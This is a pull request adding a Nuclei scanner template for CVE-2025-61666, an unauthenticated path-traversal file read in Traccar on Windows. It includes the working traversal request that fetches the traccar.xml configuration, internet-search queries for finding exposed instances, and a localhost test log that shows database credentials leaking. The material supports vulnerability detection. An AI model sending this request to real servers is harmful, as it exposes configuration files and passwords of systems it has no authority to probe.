### PR TITLE
CVE-2025-61666 - Traccar(Windows) 6.1- 6.8.1 - Local File Inclusion

### DIFF
--- a/http/cves/2025/CVE-2025-61666.yaml
+++ b/http/cves/2025/CVE-2025-61666.yaml
@@ -1,46 +1,35 @@
 id: CVE-2025-61666
+
 info:
-  name: Unauthenticated local file inclusion in Traccar
+  name: Traccar(Windows) 6.1- 6.8.1 - Local File Inclusion
   author: securitytaters
   severity: high
   description: |
-    Default installs of Traccar on Windows between versions 6.1-6.8.1 and non default installs between versions 5.8-6.0 are vulnerable to unauthenticated local file inclusion attacks which can lead to leakage of passwords or any file on the file system including the Traccar configuration file.
+    Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability caused by enabled web override configuration, letting unauthenticated attackers leak arbitrary files including passwords, exploit requires local access.
+  impact: |
+    Unauthenticated local attackers can read arbitrary files, potentially exposing sensitive information like passwords and configuration data.
+  remediation: |
+    Upgrade to version 6.9.0 or later.
   reference:
     - https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87
     - https://projectblack.io/blog/jetty-addpath-lfi/
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-61666
   metadata:
-    verified: false
+    verified: true
     max-request: 1
-    fofa-query: app="Traccar"
     shodan-query: html:"Traccar"
-  tags: lfi,traccar
+    fofa-query: app="Traccar"
+  tags: cve,cve2025,traccar,lfi
 
 http:
   - raw:
-      - |+
-        GET /..\..\..\..\..\..\..\..\..\Program%20Files\traccar\conf\traccar.xml HTTP/1.1
+      - |
+        GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1
         Host: {{Hostname}}
 
-
-    matchers-condition: and
     matchers:
-      - type: word
-        part: header
-        words:
-          - 'Content-Type: application/xml'
-      - type: word
-        part: header
-        words:
-          - 'Server: Jetty('
-      - type: word
-        part: body
-        condition: or
-        words:
-          - '   <entry key=''database.driver''>'
-          - '   <entry key=''database.url''>'
-          - '   <entry key=''database.user''>'
-          - '   <entry key=''database.password''>'
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(content_type, "application/xml")'
+          - 'contains_all(body, "database.driver","database.password","database.user")'
+          - 'status_code == 200'
+        condition: and


### PR DESCRIPTION
Unauthenticated local file inclusion in Traccar

### Template / PR Information

Adding CVE-2025-61666
https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

Command used for Verification of template
.\nuclei.exe -v -t .\CVE-2025-61666.yaml -u http://127.0.0.1:8082/ --debug

Output as below

```
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-61666] Dumped HTTP request for http://127.0.0.1:8082/..\..\..\..\..\..\..\..\..\Program+Files\traccar\conf\traccar.xml

GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Ctraccar%5Cconf%5Ctraccar.xml HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4) AppleWebKit/619.11 (KHTML, like Gecko) Version/17.3.56 Safari/619.11
Connection: close
Accept-Encoding: gzip


[VER] [CVE-2025-61666] Sent HTTP request to http://127.0.0.1:8082/..\..\..\..\..\..\..\..\..\Program+Files\traccar\conf\traccar.xml
[DBG] [CVE-2025-61666] Dumped HTTP response http://127.0.0.1:8082/..\..\..\..\..\..\..\..\..\Program+Files\traccar\conf\traccar.xml

HTTP/1.1 200 OK
Connection: close
Content-Length: 414
Accept-Ranges: bytes
Cache-Control: max-age=3600,public
Content-Type: application/xml
Date: Tue, 07 Oct 2025 06:52:07 GMT
Last-Modified: Sun, 15 Jun 2025 00:05:00 GMT
Server: Jetty(11.0.25)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE properties SYSTEM 'http://java.sun.com/dtd/properties.dtd'>
<properties>

    <!-- Documentation: https://www.traccar.org/configuration-file/ -->

    <entry key='database.driver'>org.h2.Driver</entry>
    <entry key='database.url'>jdbc:h2:./data/database</entry>
    <entry key='database.user'>sa</entry>
    <entry key='database.password'></entry>

</properties>
[CVE-2025-61666:word-1] [http] [high] http://127.0.0.1:8082/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Ctraccar%5Cconf%5Ctraccar.xml
[CVE-2025-61666:word-2] [http] [high] http://127.0.0.1:8082/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Ctraccar%5Cconf%5Ctraccar.xml
[CVE-2025-61666:word-3] [http] [high] http://127.0.0.1:8082/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Ctraccar%5Cconf%5Ctraccar.xml
[CVE-2025-61666:status-4] [http] [high] http://127.0.0.1:8082/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Ctraccar%5Cconf%5Ctraccar.xml
[INF] Scan completed in 27.9477ms. 4 matches found.
```

I was not able to replicate this without the raw http request. 